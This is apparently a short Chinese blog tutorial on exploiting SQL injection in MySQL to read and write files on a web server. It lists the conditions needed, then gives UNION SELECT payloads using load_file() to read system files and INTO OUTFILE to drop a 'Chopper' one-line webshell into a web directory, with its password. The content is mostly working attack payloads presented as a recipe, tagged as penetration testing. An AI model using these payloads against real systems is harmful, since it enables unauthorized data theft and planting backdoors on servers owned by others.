利用SQL注入漏洞实现MySQL数据库读写文件

前提必要条件

  • 需要数据库开启secure_file_priv 就是将secure_file_priv的值为空,不为空不充许写入webshell (默认不开启,需要修改mysql配置文件mysql.ini或者叫my.ini配置文件)
  • 需要知道远程目录
  • 需要远程目录有写权限
  • 需要mysql root权限

开启secure_file_priv 参数,操作看动图:
利用SQL注入漏洞实现MySQL数据库读写文件_第1张图片

读取文件

读取文件肯定是要知道,文件路径的,不知道的话就找已公布的中间件配置文件地址等

union select 1,load_file('文件路径') -- bbq

例如读取虚拟机的 boot.ini 文件:

union select 1,load_file('c:\\boot.ini') -- bbq

操作看动图:

写入文件

一般就写一个菜刀之类的小马,然后用用菜刀连接

union select "木马语句",2 into outfile "上传服务器文件路径" -- bbq

例如:我写入一菜刀一句话小马 文件 到 C:\phpStudy\WWW\123.php 目录下

union select "",2 into outfile "C:\\phpStudy\\WWW\\123.php" -- bbq

操作看动图:

菜刀一句话密码 123

你可能感兴趣的:(渗透,php,sql注入,渗透测试,sql注入漏洞利用,利用SQL注入漏洞实习读写文件)